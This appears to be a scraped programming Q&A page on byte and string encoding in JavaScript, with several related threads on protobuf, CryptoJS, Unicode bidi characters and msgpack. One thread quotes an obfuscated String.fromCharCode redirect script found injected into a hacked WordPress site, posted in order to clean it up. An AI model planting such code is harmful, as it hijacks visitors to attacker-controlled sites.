Decode invalid utf-8 by replacing troublesome byte sequences with question marks?

Decode invalid utf-8 by replacing troublesome byte sequences with question marks? - javascript

The problem: I'm given a sequence of bytes (say as a Uint8Array) which I'd like to interpret as a utf8-encoded string. That is, I'd like to decode the bytes into a valid unicode string.
However, it is possible that the bytes will not be a valid utf8-encoding. If that's the case, I'd like to do a "best effort" attempt to decode the string anyway.
In Python I can do the following:
>>> import codecs
>>> codecs.register_error('replace_?', lambda e: (u'?', e.start + 1))
>>> uint8array = map(ord, 'some mostly ok\x80string')
>>> uint8array
[115, 111, 109, 101, 32, 109, 111, 115, 116, 108, 121, 32, 111, 107, 128, 115, 116, 114, 105, 110, 103]
>>> ''.join(map(chr, uint8array)).decode('utf8', 'replace_?')
u'some mostly ok?string'
In JavaScript, I've learned the decoding would go as follows:
> uint8array = new Uint8Array([115, 111, 109, 101, 32, 109, 111, 115, 116, 108, 121, 32, 111, 107, 128, 115, 116, 114, 105, 110, 103])
[115, 111, 109, 101, 32, 109, 111, 115, 116, 108, 121, 32, 111, 107, 128, 115, 116, 114, 105, 110, 103]
> decodeURIComponent(escape(String.fromCharCode.apply(null, uint8array)))
Uncaught URIError: URI malformed(…)
As you can see, this raises an exception, much like the Python code would if I didn't specify my custom codec handler.
How would I go about getting the same behavior as the Python snippet - replacing the malformed utf8 bytes with '?' instead of choking on the whole string?

Related

Prefix protobuf message with signed 4 byte int

I am working with a Websocket API which I send protobuf objects to.
The documentation says:
Server uses Big Endian format for binary data.
Messages sent back and forth require a signed 4 byte int of the message size, prefixed to the message
So the payload should be a 4 byte int which contains the message size, followed by the message itself.
I set the message like this:
const message = req.serializeBinary();
How would I prefix a signed 4 byte int that contains the message size to this?
Note: console.log(message) prints the following to the console:
jspb.BinaryReader {decoder_: j…b.BinaryDecoder, fieldCursor_: 0, nextField_: -1, nextWireType_: -1, error_: false, …}
decoder_: jspb.BinaryDecoder
bytes_: Uint8Array(78) [0, 0, 0, 74, 152, 182, 75, 75, 242, 233, 64, 4, 49, 48, 53, 57, 242, 233, 64, 35, 77, 101, 115, 115, 97, 103, 101, 32, 108, 101, 110, 103, 116, 104, 32, 114, 101, 99, 101, 105, 118, 101, 100, 32, 105, 115, 32, 105, 110, 118, 97, 108, 105, 100, 46, 194, 233, 64, 19, 82, 105, 116, 104, 109, 105, 99, 32, 83, 121, 115, 116, 101, 109, 32, 73, 110, 102, 111]
cursor_: 78
end_: 78
error_: false
start_: 0
__proto__: Object
error_: false
fieldCursor_: 55
nextField_: 132760
nextWireType_: 2
readCallbacks_: null

I have never used google's protocol buffers library, only protobuf.js (https://github.com/protobufjs), but I assume we can work based on your object, since all we need is in message.bytes_
bl = message.bytes_.length;
msg = new Uint8Array(bl+4);
msg.set([(bl&0xff000000)>>24,(bl&0xff0000)>>16,(bl&0xff00)>>8,(bl&0xff)]);
msg.set(message.bytes_,4);
yourwebsocketobject.send(msg); // or maybe msg.buffer?
You will probably get better answers, but this may eventually work.

WordPress site hacked redirect

i have a wordpress website and i saw that when i try to view the source code with chrome its show me this (look at the code):
so i search it in my files and found a file called lt_ that has that redirect code
so i wanted to know how to find the source of the malware
<head>
<script>window.location.href = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 105, 114, 99, 46, 108, 111, 118, 101, 103, 114, 101, 101, 110, 112, 101, 110, 99, 105, 108, 115, 46, 103, 97, 47, 112, 86, 77, 89, 110, 49, 120, 82, 63, 101, 120, 116, 101, 114, 110, 97, 108, 95, 105, 100, 61, 50, 49, 38, 97, 100, 95, 99, 97, 109, 112, 97, 105, 103, 110, 95, 105, 100, 61, 52, 51, 54, 55, 53);</script>
</head>

check this: wp-content/plugins/ * try to find wp-sleeeps * / that is the problem.
Delete wp-sleeeps and after that delete lt_
Same problem last 3 hours,

First, install WordFence and configure it for a Through scan, see if anything suspicious pops up in the scan.
If you want to search the files by the string, i suggest installing a plugin "String Locator". It's the quickest way to search through all WP files.
If your WP was hacked, in 99,9% of the cases it's not only 1 file.
When, and if, you identify the string that is suspicious, i suggest to run it through phpMyAdmin search as well to ensure it's not planted in the database to some of your pages.

CryptoJS giving other results than Java's Cipher.doFinal()

I am trying to write a function in JavaScript that I already have in Java. The function simply encodes a string with AES.
I tried different types like WordArray, ByteArray, String, HexString.
byte[] IV = new byte[] { 57, 118, 97, 110, 32, 77, 101, 100, 118, 101, 100, 101, 118, 100, 101, 118 };
byte[] md5 = { 52, -123, -23, -71, -89, 6, -59, -33, -48, 56, -69, -77, -100, 107, -68, 127 };
byte[] text= { 112, 101, 116, 101, 114, 46, 109, 111, 101, 108, 108, 101, 114, 64, 119, 101, 98, 46, 100, 101 };
String TRANSFORMATION = "AES/CBC/PKCS5Padding";
Cipher _cipher;
SecretKey _password;
IvParameterSpec _IVParamSpec;
_password = new SecretKeySpec(md5, ALGORITHM);
_IVParamSpec = new IvParameterSpec(IV);
_cipher = Cipher.getInstance(TRANSFORMATION);
_cipher.init(Cipher.ENCRYPT_MODE, _password, _IVParamSpec);
encryptedData = _cipher.doFinal(text);
Base64.Encoder enc = Base64.getEncoder();
String encData=enc.encodeToString(encryptedData);
var pass = CryptoJS.enc.Hex.parse(this.toWordArray([52, -123, -23, -71, -89, 6, -59, -33, -48, 56, -69, -77, -100, 107, -68, 127]));
var iv = CryptoJS.enc.Hex.parse(this.toWordArray([57, 118, 97, 110, 32, 77, 101, 100, 118, 101, 100, 101, 118, 100, 101, 118]));
var text = this.toWordArray([112, 101, 116, 101, 114, 46, 109, 111, 101, 108, 108, 101, 114, 64, 119, 101, 98, 46, 100, 101]);
var encrypted = CryptoJS.AES.encrypt(text, pass, { iv: iv, mode: CryptoJS.mode.CBC, padding: CryptoJS.pad.Pkcs7 });
var utf8 = CryptoJS.enc.Utf8.parse(encrypted);
var base64 = CryptoJS.enc.Base64.stringify(utf8);
In Java the result is: VmivVhaBFNdJQMY5JHczcs4VQXvzH3qEswsT4PufAqg=
In JavaScript I expect the same output, but I get: VVRGUVRVQlE5VTFOQ1pLb1FFMDhUY05LQzRNcGF3UTBnNE1ZZ3luQW1Vaz0=

How can two visually identical bits of text be different to the clipboard?

I have a sublime document with two identical file paths (2 seperate lines), if I copy one my app functionality works, if I copy the other it does not.
When I select one line and do cmd + d you would expect sublime to highlight both lines, as per normal functionality. It does not. This is also true in VC code, so something is different about these two lines.
I have tried myData.toString()
I tried JSON.parse but it didn't go well I couldn't figure it out
Here at the offending lines.
/Volumes/Macintosh HD/Archive/Work/AE_Scripting/⁨Resources⁩/⁨CEP-Resources-master⁩/⁨CEP_8.x⁩/⁨Documentation
-Works
/Volumes/Macintosh HD/Archive/Work/AE_Scripting/Resources/CEP-Resources-master/CEP_8.x/Documentation
Upon uploading an example file for this post I have now some new information, as you can see here
http://gravitystaging.com/uploadarea/test/examplefile.txt
Both lines now appear as
/Volumes/Macintosh HD/Archive/Work/AE_Scripting/â¨Resourcesâ©/â¨CEP-Resources-masterâ©/â¨CEP_8.xâ©/â¨Documentation
-Works
/Volumes/Macintosh HD/Archive/Work/AE_Scripting/Resources/CEP-Resources-master/CEP_8.x/Documentation
Although in any editor they look normal and identical. So how can I process this string to remove this.

Your first string has some Unicode bidirectional marking characters in it: U+2068 and U+2069. You can use the ord function in Python to check for these:
>>> [ord(x) for x in '/Volumes/Macintosh HD/Archive/Work/AE_Scripting/⁨Resources⁩/⁨CEP-Resources-master⁩/⁨CEP_8.x⁩/⁨Documentation']
[47, 86, 111, 108, 117, 109, 101, 115, 47, 77, 97, 99, 105, 110, 116, 111, 115, 104, 32, 72, 68, 47, 65, 114, 99, 104, 105, 118, 101, 47, 87, 111, 114, 107, 47, 65, 69, 95, 83, 99, 114, 105, 112, 116, 105, 110, 103, 47, 8296, 82, 101, 115, 111, 117, 114, 99, 101, 115, 8297, 47, 8296, 67, 69, 80, 45, 82, 101, 115, 111, 117, 114, 99, 101, 115, 45, 109, 97, 115, 116, 101, 114, 8297, 47, 8296, 67, 69, 80, 95, 56, 46, 120, 8297, 47, 8296, 68, 111, 99, 117, 109, 101, 110, 116, 97, 116, 105, 111, 110]
See the ones that are 8000-something? Those are the Unicode markers you don't want.
If you just want plain ASCII, here's how I would do that in Python:
''.join(c for c in my_string if ord(c) < 256)
This strips out anything higher than U+00FF.

I'd recommend taking a look at using regex to remove all non-alphanumeric characters.
See https://stackoverflow.com/a/7225734/9899022
Since the pasted text and additional characters are already in string format, attempting to parse it to JSON or calling .toString() won't change anything about the variable.

If you cat your file in a (MacOS) bash terminal you will get identical lines. Running encguess examplefile.txt will tell you the format is UTF-8. Opening in it in SublimeText 3 with UTF-8 encoding will also show you identical lines.
But if you switch to Western (Windows 1252) encoding then you will get the exact same wrong symbols as in your example. So I guess you are using the wrong encoding to view your file.
How to switch encoding in SublimeText 3:
File => Reopen With Encoding => Choose your Encoding (UTF-8)
Edit
If you want to remove the wrong characters from your given string, you can use String.replace().
str = "/Volumes/Macintosh HD/Archive/Work/AE_Scripting/â¨Resourcesâ©/â¨CEP-Resources-masterâ©/â¨CEP_8.xâ©/â¨Documentation"
console.log("Before: ", str);
str = str.replace(/(â©)|(â¨)/g, "");
console.log("After: ", str);

I managed to solve this with the following thread
How to remove invalid UTF-8 characters from a JavaScript string?
function cleanString(input) {
var output = "";
for (var i=0; i<input.length; i++) {
if (input.charCodeAt(i) <= 127) {
output += input.charAt(i);
}
}
return output;
}
Its something I looked at early on but must have been using it incorrectly.

Trying to get msgpack-cli to give me the same packed byte array as it does in JavaScript

In JavaScript, I can use msgpack to pack an object as follows:
msgpack.pack(payload);
Where payload is the following object:
var payload = { event: "phx_join", payload: {}, ref: "1", topic: "players:1" };
When I call msgpack.pack(payload); on this object, I get the following bytes back (as a Uint8Array):
[132, 165, 116, 111, 112, 105, 99, 169, 112, 108, 97, 121, 101, 114, 115, 58, 49, 165, 101, 118, 101, 110, 116, 168, 112, 104, 120, 95, 106, 111, 105, 110, 167, 112, 97, 121, 108, 111, 97, 100, 128, 163, 114, 101, 102, 161, 49]
How can I use msgpack-cli in C# to convert an object from C# to the same byte sequence as above? The object format I am using in C# is not so important, what's important is that the byte sequence is the same. Here is what I've tried:
public class Payload
{
public string #event;
public MessagePackObject payload;
public string #ref;
public string topic;
}
var payload = new Payload
{
#event = "phx_join",
payload = new MessagePackObject(),
#ref = "1",
topic = "players:1"
};
var packedBytes = SerializationContext.Default.GetSerializer<Payload>().PackSingleObject(payload);
Unfortunately, the packed bytes I get back in this case are as follows:
[148, 168, 112, 104, 120, 95, 106, 111, 105, 110, 192, 161, 49, 169, 112, 108, 97, 121, 101, 114, 115, 58, 49]
It is not the same as the packed data I get from JavaScript. I thought message pack was supposed to be cross-platform friendly. What's going on here and how can I create a C# equivalent object to make the deserializer pack it to the same byte array as it does in JavaScript?

I figured it out. The trick is to check the first byte encoded in the JavaScript, and you will see that 132 corresponds to HEX 0x84. HEX 0x84 according to the message pack specification is a fixmap (0x80 to 0x8f). Using this hint, we can try to guess that a fixmap must correspond to a dictionary data type in C# (since a map is more or less like a dictionary of key-value pairs).
We just need to use a payload object that is actually a dictionary of string and object pairs, and msgpack-cli will successfully pack it to the same byte sequence from C#:
var payload = new Dictionary<string, object>() {
{ "event", "phx_join" },
{ "payload", new Dictionary<string, object>() },
{ "ref", "1" },
{ "topic", "players:1" }
};
var packedBytes = SerializationContext.Default.GetSerializer<Dictionary<string, object>>().PackSingleObject(payload);

We Keep Coding

JavaScript is the programming language of the Web.

Decode invalid utf-8 by replacing troublesome byte sequences with question marks? - javascript

Related

Prefix protobuf message with signed 4 byte int

WordPress site hacked redirect

CryptoJS giving other results than Java's Cipher.doFinal()

How can two visually identical bits of text be different to the clipboard?

Trying to get msgpack-cli to give me the same packed byte array as it does in JavaScript

Categories

Resources